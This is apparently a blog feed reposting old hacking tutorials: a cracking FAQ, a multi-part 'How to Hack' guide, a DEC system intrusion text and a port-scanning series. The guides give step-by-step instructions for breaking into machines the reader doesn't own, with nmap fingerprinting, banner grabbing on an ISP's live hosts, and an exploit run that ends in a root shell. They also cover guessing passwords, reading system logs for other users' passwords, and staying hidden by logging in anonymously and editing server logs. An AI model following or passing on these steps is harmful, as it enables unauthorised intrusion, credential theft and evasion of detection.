Hackero_ka_Hacker

All About Cracking

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:25:00 +0000

Q: Where can I get a VB Decompiler?

A: At CBE's Memberz FTP Area (for members) or search the net.

Q: I heard about SoftICE. What's that?

A: SoftICE is a powerful (but not that easy to use) debugger used for

cracking programs too.

Q: What's the difference between hacking and cracking?

A: Go bother someone else! ;)

No, seriously, Hacking is breaking into systems and getting passwords, ...

And cracking is registering softwares without a serial number and without

paying.

Well that's it!!!

I hope that you enjoyed my tutorial,

Da Cracker/CBE

Copyright (c) 1998 by Da Cracker. All rights reserved. No portions of this

document can be used without my authorisation, *except* by CBE memberz.

E-mail: searchstops@gmail.com

To join SECTOR_7, please go to http://searchstops.com/

and like our fan page

Jai Shree Raam

How to Hack Final 2011 more updates aval ASAP

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:13:00 +0000

Thats it... what you do from here is the matter of other how2s. You

also might be asking what is NetCat for... well some exploits require

it. Notice that above exploit used anonymous login, so if anonymous

access was disabled there, it wouldnt work. Thats why we were checking

for anonymous access at step f. If anon access was disabled, this exploit

would only work if you had a login and password to ftp to the box...

so you must read source to see how it works. Different exploits work

differently and have different syntax. This was just one easy example,

but basic prinsiple is the same.

Thats all it takes to break into a machine... Well that is if machine

is not protected or something like that. In our case machine was totaly

open on the internet hackable by anybody. There are a lot of machines

out there like this. But also a lot of protected machines that are

behind different firewalls and with different security mechanisms

installed. Stealth coordinated attack techniques will be discussed in

later documentation. Documentadion on how to remain undetected and

various other tricks of the trade will be done later too.

PS. all the above explainations should give you general idea what

crackers do to break into your network. Hopefuly you will use this

information wisely to protect your network from intrusions.

Mail me for any questions you might have.

kgb_kid 10th of May 2001 07H37

-------

email: searchstops@gmail.com

site: http://www.searchstops.com/

Jai Shree Raam

How to Hack part 3

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:12:00 +0000

From the above you can see that we FTPd to 196.1.2.3 and that 196.1.2.3

is runing wu-2.6.0. We also tried loging in as "anonymous" and it was

successfull too.

g) Get exploit for this version of FTPd. go to www.hack.co.za

(daemon/ftp/ section) and get wuftpd2600.c exploit. View this exploit

code and you'll see that its coded for spesific OSs one of which is

Red Hat 6.2. Lets say that lame_box.za.net is runing Red Hat 6.2 to our

luck :) Then just compile this exploit, run it against lame_box.za.net

and it should give you root access (ie. full control of the system):

----------------------------- cut here -----------------------------

root@kgb:~/# ./wuftpd2600 -t -s 0 196.1.2.3

Target: 196.1.2.3 (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm

Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152

loggin into system..

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS

230-Next time please use your e-mail address as your password

230- for example: joe@kgb.za.net

230 Guest login ok, access restrictions apply.

STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]

STEP 3 : Checking if we can reach our return address by format string

STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)

STEP 5 : Sending code.. this will take about 10 seconds.

Press ^\ to leave shell

Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown

uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

Bang! You have root!

Jai Shree Raam

How to Hack part 2

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:11:00 +0000

This is self explanatory... just shows open ports. You can see that

its runing FTP daemon among lots of other things. We will be targeting

this FTP daemon.

f) See what version of FTP daemon your target is running. You could

just telnet to 21st port on that host of you could ftp to that host:

"telnet 196.1.2.3 21"

or

"ftp 196.1.2.3"

Both will spit out a banner showing the version of FTP daemon like the

following:

----------------------------- cut here -----------------------------

root@kgb:~# ftp 196.1.2.3

Connected to 196.1.2.3.

220 lame_box.za.net FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.

Name (lame_box:root): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password:

230-Welcome, archive user! This is an experimental FTP server. If have any

230-unusual problems, please report them via e-mail to root@kgb.pandora.net

230-If you do have problems, please try using a dash (-) as the first character

230-of your password -- this will turn off the continuation messages that may

230-be confusing your ftp client.

230-

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>by

root@kgb:~#

Jai Shree Raam

How to hack The Basics 2011

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:09:00 +0000

This is very basic text

and more advanced text will come later. Its easier to explain from

crackers perspective, so thats the way i'll do it. The following

steps are usualy taken by clueless crackers who dont know much about

anything, but they are the ones that do the most dammage...

so here it goes...

Things you need

---------------

A shell account of some kind. Usualy people jsut install Linux

in our days, but normal shell account will do. Just make sure you

can run basic programs like: nslookup, host, dig, ping, traceroute,

telnet, ssh, ftp etc. Also make sure it has GCC installed and other

dev tools, so you could compile stuff. Also helps having tools like

NMAP and NetCat. Last thing you need is exploits.

* Shell account is similar to your DOS shell, except it has different

commands and functions. Where you could get one? Your friend who has

Linux or something installed could give you a log on to his box or

maybe your ISP provides you with a shell (i doubt that very much)

* Linux is an operating system that most hackers/crackers use

* NMAP is an advanced port-scanner

* NetCat is a telnet like proggy which allows you to stream data to

specific host

* Exploits different programs, writen mainly in C, which do all the

work for you. Exploits are the progs that break into computer for

you. Where to find them? Well thats easy! http://www.hack.co.za

Weeellll... all the things above is all you need to brek into some

network! Basicaly all u need is:

a) Linux (http://www.slackware.com)

b) Nmap (http://www.insecure.org)

c) NetCat (http://www.l0pht.com/~weld/netcat/)

d) Exploits (http://www.hack.co.za)

Steps

-----

a) Install Linux and bring it on line. I'm not goanna explain how to

do this here... cause there are lots of books on this topic already.

Look in http://kgb.za.net/books/ ask me for username and password if

you dont know it yet.

b) Install nmap.

1) tar zxvf nmap.tar.gz

2) cd nmap

3) ./configure && make && make install

This is basic installation process.

c) Pick a target on line. Lets say your target is lame_box.za.net

d) Get its IP by doing "nslookup lame_box.za.net"

This will spit out the IP of the host... in our case it will be

196.1.2.3

e) See what services this host is running and hopefuly detect its

OS by doing:

"nmap -sS -O 196.1.2.3"

This command will give you output similar to the following:

----------------------------- cut here -----------------------------

root@kgb:~# nmap -sS -O 196.1.2.3

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )

Interesting ports on lame_box.za.net (196.1.2.3):

(The 1531 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

25/tcp open smtp

80/tcp open http

111/tcp open sunrpc

113/tcp open auth

515/tcp open printer

963/tcp open unknown

1024/tcp open kdm

4444/tcp filtered krb524

6000/tcp open X11

6699/tcp filtered napster

OS guess for host: Linux 2.2.14-2.2.16

Uptime 0.160 days (since Mon Apr 30 14:51:06 2001)

Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds

root@kgb:~#

Jai Shree Raam

BASICS OF HACKING 1, 2011

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:06:00 +0000

WELCOME TO BASICS OF HACKING I: DEC'S. IN THIS ARTICLE YOU WILL LEARN HOW TO LOG IN TO DEC'S, LOGGING OUT, AND ALL THE FUN STUFF TO DO IN-BETWEEN. ALL OF THIS INFORMATION IS BASED ON A STANDARD DEC SYSTEM. SINCE THERE ARE DEC SYSTEM S

10 AND 20, AND WE FAVOR, THE DEC 20, THERE WILL BE MORE INFO ON THEM IN THIS ARTICLE. IT JUST SO HAPPENS THAT THE DEC 20 IS ALSO THE MORE COMMON OF THE TWO, AND IS USED BY MUCH MORE INTERESTING PEOPLE (IF YOU KNOW WHAT WE MEAN...)

OK , THE FIRST THING YOU WANT TO DO WHEN YOU ARE RECEIVING CARRIER FROM A DEC

SYSTEM IS TO FIND OUT THE FORMAT OF LOGIN NAMES. YOU CAN DO THIS BY LOOKING

AT WHO IS ON THE SYSTEM. DEC=> @ (THE 'EXEC' LEVEL PROMPT) YOU=> SY SY IS SHO

RT FOR SY(STAT) AND SHOWS YOU THE SYSTEM STATUS. YOU SHOULD SEE THE FORMAT OF

L OGIN NAMES... A SYSTAT USUALLY COMES UP IN THIS FORM: JOB LINE PROGRAM USER

JOB: THE JOB NUMBER (NOT IMPORTANT UNLESS YOU WANT TO LOG THEM OFF LATER)

LINE: WHAT LINE THEY ARE ON (USED TO TALK TO THEM...) THESE ARE BOTH TWO OR

THREE DIGIT NUMBERS. PROGRAM: WHAT PROGRAM ARE THEY RUNNING UNDER? IF IT

SAYS 'EXEC' THEY AREN'T DOING ANYTHING AT ALL... USER: AHHHAHHHH! THIS IS TH

E USER NAME THEY ARE LOGGED IN UNDER... COPY THE FORMAT, AND HACK YOURSELF OUT

A WORKING CODE... LOGIN FORMAT IS AS SUCH: DEC=> @ YOU=> LOGIN USERNAME PASS

WORD USERNAME IS THE USERNAME IN THE FORMAT YOU SAW ABOVE IN THE SYSTAT. AFTER YOU HIT THE SPACE AFTER YOUR USERNAME, IT WILL STOP ECHOING CHARACTERS

BACK TO YOUR SCREEN. THIS IS THE PASSWORD YOU ARE TYPING IN... REMEMBER,

PEOPLE USUALLY USE THEIR NAME, THEIR DOG'S NAME, THE NAME OF A FAVORITE CAR

ACTER IN A BOOK, OR SOMETHING LIKE THIS. A FEW CLEVER PEOPLE HAVE IT SET TO A

KEY CLUSTER (QWERTY OR ASDFG). PW'S CAN BE FROM 1 TO 8 CHARACTERS LONG,

ANYTHING AFTER THAT IS IGNORED. YOU ARE FINALLY IN... IT WOULD BE NICE TO

HAVE A LITTLE HELP, WOULDN'T IT? JUST TYPE A ? OR THE WORD HELP, AND IT WILL

GIVE YOU A WHOLE LIST OF TOPICS... SOME HANDY CHARACTERS FOR YOU TO KNOW

WOULD BE THE CONTROL KEYS, WOULDN'T IT? BACKSPACE ON A DEC 20 IS RUB WHICH IS

255 ON YOUR ASCII CHART. ON THE DEC 10 IT IS CNTRL-H. TO ABORT A LONG

LISTING OR A PROGRAM, CNTRL-C WORKS FINE. USE CNTRL-O TO STOP LONG OUTPUT TO

THE TERMINAL. THIS IS HANDY WHEN PLAYING A GAME, BUT YOU DON'T WANT TO

CNTRL-C OUT. CNTRL-T FOR THE TIME. CNTRL-U WILL KILL THE WHOLE LINE YOU ARE

TYPING AT THE MOMENT. YOU MAY ACCIDENTLY RUN A PROGRAM WHERE THE ONLY WAY OUT

IS A CNTRL-X, SO KEEP THAT IN RESERVE. CNTRL-S TO STOP LISTING, CNTRL-Q TO

CONTINUE ON BOTH SYSTEMS. IS YOUR TERMINAL HAVING TROUBLE?? LIKE, IT PAUSES

FOR NO REASON, OR IT DOESN'T BACKSPACE RIGHT? THIS IS BECAUSE BOTH SYSTEMS

SUPPORT MANY TERMINALS, AND YOU HAVEN'T TOLD IT WHAT YOURS IS YET... YOU ARE

USING A VT05 (ISN'T THAT FUNNY ? I THOUGHT I HAD AN APPLE) SO YOU NEED TO TELL

IT YOU ARE ONE. DEC=> @ YOU=> INFORMATION TERMINAL OR... YOU=> INFO TER THIS

SHOWS YOU WHAT YOUR TERMINAL IS SET UP AS... DEC=> ALL SORTS OF SHIT, THEN

THE @ YOU=> SET TER VT05 THIS SETS YOUR TERMINAL TYPE TO VT05. NOW LET'S SEE

WHAT IS IN THE ACCOUNT (HERE AFTER ABBREVIATED ACCT.) THAT YOU HAVE HACKED

ONTO... SAY => DIR SHORT FOR DIRECTORY, IT SHOWS YOU WHAT THE USER OF THE CODE

HAS SAVE TO THE DISK. THERE SHOULD BE A FORMAT LIKE THIS: XXXXX.OOO XXXXX IS

THE FILE NAME, FROM 1 TO 20 CHARACTE RS LONG. OOO IS THE FILE TYPE, ONE OF:

EXE, TXT, DAT, BAS, CMD AND A FEW OTHERS THAT ARE SYSTEM DEPENDANT. EXE IS A

COMPILED PROGRAM THAT CAN BE RUN (JUST BY TYPING ITS NAME AT THE @). TXT IS A

TEXT FILE, WHICH YOU CAN SEE BY TYPING= > TYPE XXXXX.TXT DO NOT TRY TO=> TYPE

XXXXX.EXE THIS IS VERY BAD FOR YOUR TERMINAL AND WILL TELL YOU ABSOLUTLY

NOTHING. DAT IS DATA THEY HAVE SAVED. BAS IS A BASIC PROGRAM, YOU CAN HAVE

IT TYPED OUT FOR YOU. CMD IS A COMMAND TYPE FILE, A LITTLE TOO COMPLICATED TO

GO INTO HERE. TRY => TAKE XXXXX.CMD BY THE WAY, THERE ARE OTHER USERS OUT

THERE WHO MAY HAVE FILES YOU CAN USE (GEE, WHY ELSE AM I HERE?). TYPE => DIR

<*.*> (DEC 20) => DIR [*,*] (DEC 10) * IS A WILDCARD, AND WILL ALLOW YOU TO

ACCESS THE FILES ON OTHER ACCOUNTS IF THE USER HAS IT SET FOR PUBLIC ACCESS.

IF IT ISN'T SET FOR PUBLIC ACCESS, THEN YOU WON'T SEE IT. TO RUN THAT PROGRAM:

DEC=> @ YOU=> USERNAME PROGRAM-NAME USERNAME IS THE DIRECTORY YOU SAW THE FILE

LISTED UNDER, AND FILE NAME WAS WHAT ELSE BUT THE FILE NAME? ** YOU ARE NOT

ALONE ** REMEMBER, YOU SAID (AT THE VERY START) SY SHORT FOR SYSTAT, AND HOW

WE SAID THIS SHOWED THE OTHER USERS ON THE SYSTEM? WELL, YOU CAN TALK TO THEM,

OR AT LEAST SEND A MESSAGE TO ANYONE YOU SEE LISTED IN A SYSTAT. YOU CAN DO

THIS BY: DEC=> THE USER LIST (FROM YOUR SYSTAT) YOU=> TALK USERNAME (DEC 20)

SEND USERNAME (DEC 10) TALK ALLOWS YOU AND THEM IMMEDIATE TRANSMISSION OF

WHATEVER YOU/THEY TYPE TO BE SENT TO THE OTHER. SEND ONLY ALLOW YOU ONE

MESSAGE TO BE SENT, AND ONLY AFTER YOU HIT . WITH SEND, THEY WILL

SEND BACK TO YOU, WITH TALK YOU CAN JUST KEEP GOING. BY THE WAY, YOU MAY BE

NOTICING WITH THE TALK COMMAND THAT WHAT YOU TYPE IS STILL ACTED UPON BY THE

PARSER (CONTROL PROGRAM). TO AVOID THE CONSTANT ERROR MESSAGES TYPE EITHER:

YOU=> ;YOUR MESSAGE YOU=> REM YOUR MESSAGE THE SEMI-COLON TELLS THE PARSER THAT

WHAT FOLLOWS IS JUST A COMMENT. REM IS SHORT FOR 'REMARK' AND IGNORES YOU

FROM THEN ON UNTIL YOU TYPE A CNTRL-Z OR CNTRL-C, AT WHICH POINT IT PUTS YOU

BACK IN THE EXEC MODE. TO BREAK THE CONNECTION FROM A TALK COMMAND TYPE:

YOU=> BREAK PRIV'S: IF YOU HAPPEN TO HAVE PRIVS, YOU CAN DO ALL SORTS OF

THINGS. FIRST OF ALL, YOU HAVE TO ACTIVATE THOSE PRIVS. YOU=> ENABLE THIS

GIVES YOU A $ PROMPT, AND ALLOWS YOU TO DO THIS: WHATEVER YOU CAN DO TO YOUR

OWN DIRECTORY YOU CAN NOW DO TO ANY OTHER DIRECTORY. TO CREATE A NEW ACCT.

USING YOUR PRIVS, JUST TYPE = > BUILD USERNAME IF USERNAME IS OLD, YOU CAN EDIT

IT, IF IT IS NEW, YOU CAN DEFINE IT TO BE WHATEVER YOU WISH. PRIVACY MEANS

NOTHING TO A USER WITH PRIVS. BY THE WAY, THERE ARE VARIOUS LEVELS OF PRIVS:

OPERATOR, WHEEL, CIA WHEEL IS THE MOST POWERFUL, BEING THAT HE CAN LOG IN FROM

ANYWHERE AND HAVE HIS POWERS. OPERATORS HAVE THEIR POWER BECAUSE THEY ARE AT

A SPECIAL TERMINAL ALLOWING THEM THE PRIVS. CIA IS SHORT FOR 'CONFIDENTIAL

INFORMATION ACCESS', WHICH ALLOWS YOU A LOW LEVEL AMOUNT OF PRIVS. NOT TO

WORRY THOUGH, SINCE YOU CAN READ THE SYSTEM LOG FILE, WHICH ALSO HAS THE

PASSWORDS TO ALL THE OTHER ACCOUNTS. TO DE-ACTIVATE YOUR PRIVS, TYPE YOU=>

DISABLE

WHEN YOU HAVE PLAYED YOUR GREEDY HEART OUT, YOU CAN FINALLY LEAVE THE SYSTEM

WITH THE COMMAND=> LOGOUT THIS LOGS THE JOB YOU ARE USING OFF THE SYSTEM

(THERE MAY BE VARIENTS OF THIS SUCH AS KJOB, OR KILLJOB). BY THE WAY, YOU CAN

SAY (IF YOU HAVE PRIVS) => LOGOUT USERNAME AFL KILLS THE USERNAME'S TERMINAL.

THERE ARE MANY MORE COMMANDS, SO TRY THEM OUT. JUST REMEMBER: LEAVE THE

ACCOUNT IN THE SAME STATE AS YOU FOUND IT. THIS WAY THEY MAY NEVER KNOW THAT

YOU ARE PLAYING LEECH OFF THEIR ACCT. NEXT TIME: THE BASICS OF HACKING II: V

AX'S (UNIX)

Jai Shree Raam

Final Step In Port Scaning

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:02:00 +0000

This is the stage where real hackers are differentiated between script kiddies, this is when those people who really know something prevail. Normally say if a exploit is designed to work on Linux, then if you edit its code and change its header files (if necessary), then that particular exploit can be made to run on Windows too. However, there are certain exploits, which simply would not run on a different OS than it is designed too.

Anyway, let us get back to point. You have edited the exploit code and made it compatible with your platform. Now what else? Another thing that you want to keep in mind is the Operating System, which the exploit can exploit. You see, there are certain exploits, which work only if the victim system is running a specific Operating System. For Example,

There was once a Sendmail hole, which worked only if the target System was running Sun OS without which, it simply refused to even work.

So in some cases it becomes necessary, to find out the Operating System running at the target system. Although not all exploits require the target system to be running a specific system, but why take a chance. Right?

So basically you should be aware of the following things while getting a ready to use exploit-:

1. 1.) The Daemon name and version you are trying to exploit For Example, Sendmail 8.9.4

2. 2.) The Operating System at which it is designed to run. (If necessary)

3. 3.) The operating System it requires the target system to be running. (If necessary)

That brings us to as to how to find out the Operating System running at the target system? Well, the HTTP port holds the key. Simply, telnet to Port 80 of the target system.

C:\windows>telnet xxx.bol.net.in 80

Now, once you get the input prompt, then, type an invalid HTTP command. For Example, X or Iamgreat or abc etc. Just type anything as long as it is not a valid HTTP command. Then press enter twice.

***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********

On Port 80 of my example target system, I type simply ‘ankit’ and press enter twice. This is the kind of response I get:

HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it(again not so important), but it also gives us the OS name and OS version, it is running. Wow!!! It gives hackers who want to break into their server the ultimate piece of information, which they require.

Well, these were the common ways of finding out more information about a host in your quest to break into it. I will soon be updating this manual, hope you enjoyed the first edition. Till the next update, goodbye.

Jai Shree Raam

Port Scanner 7

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:01:00 +0000

Sendmail is certainly the buggiest daemon on earth; it has the highest number of known exploits amongst all the daemons. So this probably should get us through. Let us telnet to Port 25 and find out whether an exploitable version of Sendmail is running.

C:\windows> telnet xxx.bol.net.in 25

220 xxx.bol.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/27Jun00-0346PM) Thu, 29 Jun 2000 14:18:12 0530 (IST)

When you telnet to Port 25, then the first thing that you come across would be a something like the above welcome daemon banner. A daemon banner is a Hacker’s best friend. It reveals important information about the host, which proves to be invaluable in breaking into it. It basically tells you which daemon or service is running on that port and also the version of that particular service. Like for example, in this case, the Sendmail daemon banner tells us that ESMTP Sendmail 8.9.1 is running and it also gives us other information about the host at which this service is running.

Anyway, getting back to the topic, this banner reveals a big vulnerability existing in the host computer. It tells us that xxx.bol.net.in is running an old, vulnerable version of Sendmail. The latest version is Sendmail 8.9.4 (correct me if I am wrong.), so this particular version of Sendmail wouldn’t be without any bugs.

So then what you do is visit PacketStorm or search at your favorite Hacking stuff related search engine for a C program which demonstrates how to exploit version 8.9.4 of Sendmail. Now, all this might sound a bit too simple, well it certainly isn’t, read on for more info.

Now, there are a couple of things that you need to keep in mind while getting this done. Say, you have found out that the victim runs Sendmail 8.9.4, now you cannot simply break in by running any exploit for this version. By that what, I mean to say is that, an exploit, which is coded to be executed on a Linux platform, will not work if you try to compile and run it on a Windows platform. So basically before you execute the ‘kewl’ exploit program that you downloaded, you should find out which platform it is meant for and if you are not running that platform, then you will need to get your gray cells working.

Jai Shree Raam

Port Scaning Part 6

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 19:00:00 +0000

you could get into some serious trouble. [Well actually not much, only say your account might be disabled. However, it could be worse.]

Ok, you are in, now let us get the FTP client to tell us which commands are available by typing the help command.

ftp> help

Commands may be abbreviated. Commands are:

! delete literal prompt

? debug ls put

append dir mdelete pwd

ascii disconnect mdir quit

bell get mget quote

binary glob mkdir recv

bye hash mls remotehelp

cd help mput rename

close lcd open rmdir

Uhmmm.,.., none of the above commands seem to be or sound to be of use to us. So the ‘help’ command did not reveal any useful commands. However, you see the above list of commands are commands which are offered by the FTP client and almost more often than not, the FTP daemon offers a wider array of commands. To get a complete list of commands offered by the FTP daemon, use the ‘remote help’ command:

Ftp> remote help

214-The following commands are recognized (* =>'s unimplemented).

USER PORT STOR MSAM* RNTO NLST MKD CDUP

PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP

ACCT TYPE MLFL* MRCP* DELE SYST RMD STOU

SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE

REIN* MODE MSND* REST XCWD HELP PWD MDTM

QUIT RETR MSOM* RNFR LIST NOOP XPWD

214 End of help

Note: To get a single line description of each command, type help followed by a space and the command of which you want a description.

One thing to remember here is that to execute any command from the remote FTP commands list you need to make use of the ‘literal’ keyword. What I mean by that is that all remote FTP commands have to be preceded by the word ‘literal’. For example, say you want to execute the remote FTP command: ‘stat’, then you would type:

ftp> literal stat

***************

HACKING TRUTH: According to FTP help, the literal command is described as:

ftp> help literal

literal send arbitrary ftp command

***************

Anyway, amongst the remote FTP commands, the commands of interest to us are-: ‘stat’ and ‘syst’. Let us see what they return when executed-:

ftp>literal stat

211- ftp2.xxx.bol.net.in FTP server status:

Version 5.60

Connected to 203.xx.251.198 (203.xx.251.198)

Logged in anonymously

TYPE: ASCII, FORM: Nonprint; STRUcture: File; transfer MODE: Stream

211- No data connection

211 End of status

Note: The IP address is of xxx.bol.net.in and not your machine.

ftp> literal syst

215 UNIX Type: L8 Version: BSD-198911

Voila, we get the Operating System name running on ftp2.xxx.bol.net.in. At last some useful information.

Finger and HTTP both failed, what do we do now? Let us turn to the den of the Buggiest daemon on Earth i.e. Sendmail: Port 25, the SMTP port.

Jai Shree Raam

Port Scaning Part 5

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:58:00 +0000

We are immediately greeted by the FTP daemon banner, which tells us that this is the FTP server where, people using MTNL’s (My ISP) Internet Services, can upload their site. Now, normally FTP daemon banners are more informative than this one. They usually do give away the name of the Operating System running and also the FTP daemon running. Well, actually it is the login prompts of the daemon banner which gives us the Operating System running on it. Normally, a typical daemon banner would have the following Login prompt:

220 xxx2.bol.net.in FTP server (Digital UNIX Version 5.60) ready.

User (bol.net.in :( none)):

Notice the System name in the brackets on the first line. However, normally almost all FTP daemons are better configured (that is the case in the example target system: xxx.bol.net.in) and their login prompt is somewhat like the below:

220 ftp2.xxx.bol.net.in FTP server ready.

User (mail2.bol.net.in :( none)):

See, no Operating System name. However, with the help of some kewl commands, such systems too can be reveal the OS running on them. However, before we go on, there is one thing that you have to be clear about. Now, we had FTP’ed to xxx.bol.net.in, so you normally expect to connect to Port 21 of xxx.bol.net.in, however that is not true. (Atleast in this case.) If you look at the daemon banner again, then you would notice that the last line says:

220 ftp2.xxx.bol.net.in FTP server ready.

Now how did that happen? Well, is Port 21 not open on xxx.bol.net.in ? Well, no and yes. What actually happens is that, Port 21 of xxx.bol.net.in is open and a daemon there is listening for connections. As soon as a connection is established, it transfers the control or connected the visitor to ftp2.xxx.bol.net.in, which is on the same network as xxx.bol.net.in. Now this, ftp.xxx.bol.net.in system is solely a FTP machine. It has no other services running. So whatever information, we gather from such a FTP port is not of xxx.bol.net.in but of ftp2.bol.net.in. Get it?

Anyway, when you get the login prompt, then login anonymously with the anonymous as the Username and a false email address as the password.

220 ftp2.xxx.bol.net.in FTP server ready.

User (ftp2.xxx.bol.net.in:(none)): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password: xxx@linux.net

230 User anonymous logged in. Access restrictions apply.

Even if you have an account at the FTP server into which you plan to break in, it is always better not to use that pair of Username and Password. Logging in anonymously has many advantages. Say if you did cause some harm to the target system and if you use your (Nonanonymous) Username and Password pair, then if you were not able to edit the server logs

Jai Shree Raam

Port Scaning Part 4

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:57:00 +0000

I get the NOT FOUND error message; this probably means that this system does not support CGI-Scripts. If the CGI-Bin directory had been blocked from public access, then we would probably have gotten the Forbidden Error Message.

However, finding out that our target system does have the CGI-Bin directory cannot be said to be disappointing as the known CGI exploits are almost primitive and finding out new exploits should be kept out of this manual.

OK, so Port 80 and Port 79 are ruled out, they neither have any vulnerability nor do they give any information about the target system. [Well actually the HTTP port does give us some valuable information, but we will come to that later.]

Anyway, so let us try Port 21 or the FTP port. Now, there are two ways of connecting to Port 21 of a host, the first one is to telnet to Port 21 and other one is to use the MS-DOS FTP client. You could choose any of the two for this section, however, I kind of like the command line FTP client, although many people say it is lame. Anyway, so I launch up a FTP connection to xxx.bol.net.in.

C:\windows>ftp xxx.bol.net.in

Connected to xxx.bol.net.in.

220-

220-#*************************************************************

220-# Welcome to MTNL's ftp site

220-#*************************************************************

220-#

220-# You can upload your own homepages at this site!!!

220-#

220-# Just login with your username and upload the HTML pages.

220-# (You can use your favourite HTML editor as well)

220-#

220-# World will see it at http://web2.mtnl.net.in/~yourusername/

220-#

220-# So get going......UNLEASH YOUR CREATIVITY !!!!

220-#

220-#*************************************************************

220-

220 ftp2.xxx.bol.net.in FTP server ready.

Jai Shree Raam

Vertual port scaning Part 3

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:54:00 +0000

Some ISP's are quite aware of Hacking Activities and are one step ahead. They may be running some excellent software, which will keep hackers away. Ether Peek is an excellent example of sniffing software, which can easily trace users who are port scanning. Nuke Nabber a Windows freeware claims to be able to block Port Scans. I have not tested it so I can't say for sure. Then there is another fun program known as

Port Dumper, which can fake daemon (services) like Telnet, Finger etc. There is also some software, which will show a weird list of open ports. What I mean by that is, if you port scan a host running such software, then it will keep showing random open ports, and you port Scanning Software will go crazy.

Anyway, so once you get a list of open ports, start analyzing the weak points or the services which might help us to get more information about the target system which would prove invaluable to the breaking in process. Try to exploit the commands or the options available on each open port to either find a vulnerability, which could be exploited, or some kind of information on the target system. That is pretty much the only kind of things that we would be looking for. Now, let me explain how I try to find out such things with the list of open ports (of my ISP) and services running on them.

Note: Before proceeding, refer to the table of open ports which we got earlier(of host xxx.bol.net.in) in the manual and yes, I am starting from Port 79 as if I start from Port 21, then the manual will become very very short.

It has Port 79 open or in other words, has finger running, however, almost all Finger daemon are configured to not return much information about Users, however, let us try some common Finger exploits which can sometimes very very rarely get you root.

finger root

finger system

finger

These exploits are very very old and do not work almost 99 times out of 100. So the Finger port is ruled out.

Now let us move on, in the list of open ports, the HTTP port or Port 80 is also open, this means that this target system probably maintains a web site. So let me launch my favorite browser (Internet Explorer, if you are interested.) and see what they have on their site. Well, actually we are not even remotely interested in what they have on their site, but what we are interested in is to see, whether they have the CGI-BIN directory open to public or not, an dif yes if any of the common CGI exploits, which get you root, work or not.

So I type in the following in the URL box of my browser:

http://xxx.bol.net.in/cgi-bin

Jai Shree Raam

vertual port scaning part 2

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:52:00 +0000

Anyway, let me assume that you have got hold of a good ‘impossible to detect’ Port Scanner, now scan the target system for all open ports and record the open lists:

Note: In this manual, I have taken up my ISP as an example target system. It would be foo-barred throughout as xxx.bol.net.in

In my case, I found that the following ports were open:

Port Number Service

21 FTP

23 Telnet

25 SMTP

53 DNS

79 Finger

80 HTTP

110 POP

111 Not Useful

389 Not Useful

512 rlogin

Note: Only a few Port Scanners give you both the open Ports and the services running on them. Most Port Scanners only return the list of Open Ports. This is fine too; as once you get the list of open ports then you can find out the corresponding services running on them, referring to the RFC 1700. It contains the complete list of Port Numbers and the corresponding popularly running services.

Now port scanning takes advantage the 3-stage TCP handshake to determine what ports are open on the

Remote computer. To learn more about the TCP\IP protocol read the networking manuals that I distribute on

My mailing list.

Tools like SATAN and lots of them more allow you to find out the list of open ports, the daemon or the service running at each open port and also the service's vulnerability at the click of a button. You can't call yourself a hacker if you need some Software, which first of all is not written by you to do something as lame as a port scan. Well yes I do agree that looking for open ports manually on a server would take a long time. But what I am suggesting is that you use a Port Scanning tool, which just gives you a list of open ports without the list of services and the vulnerabilities. I assure you, if you try and explore an open port of a remote server manually, you will be able to learn more about the remote system and also it will give you a taste of what hacking actually is. If you use a port scanner, which gives you all details at the click of a button to impress your friends, let me assure you none of them will be impressed, as I am sure anyone can use SATAN and other such scanners.

Another thing you need to be careful about before port scanning your ISP is that most port scanners are very easily detected and can easily be traced and you have no excuse if you are caught doing a port scan on a host., it a sure sign of Hacker Activity. There are many stealth scanners like Nmap, which claim to be untraceable. But the truth is that they are very much traceable and they are quite inaccurate as they send only a single packet to check if a port is open or not. And if the host is running the right kind of Sniffer software maybe Etherpeek then the Port scan can be easily detected and the IP of the user logged. Anyway some ISP's are really afraid of Hacking activities and even at the slightest hint of some suspicious hacking activity something like Port scanning, they can disable your account. So just be careful.

************

Evil Hacking Trick: Well try to keep an eye on TCP port 12345, and UDP port 31337 these are the default

ports for the popular trojans NetBus and BO, respectively

*************

Jai Shree Raam

Virtual Port Scaning Part 1

noreply@blogger.com (turkiya786) — Tue, 15 Feb 2011 18:52:00 +0000

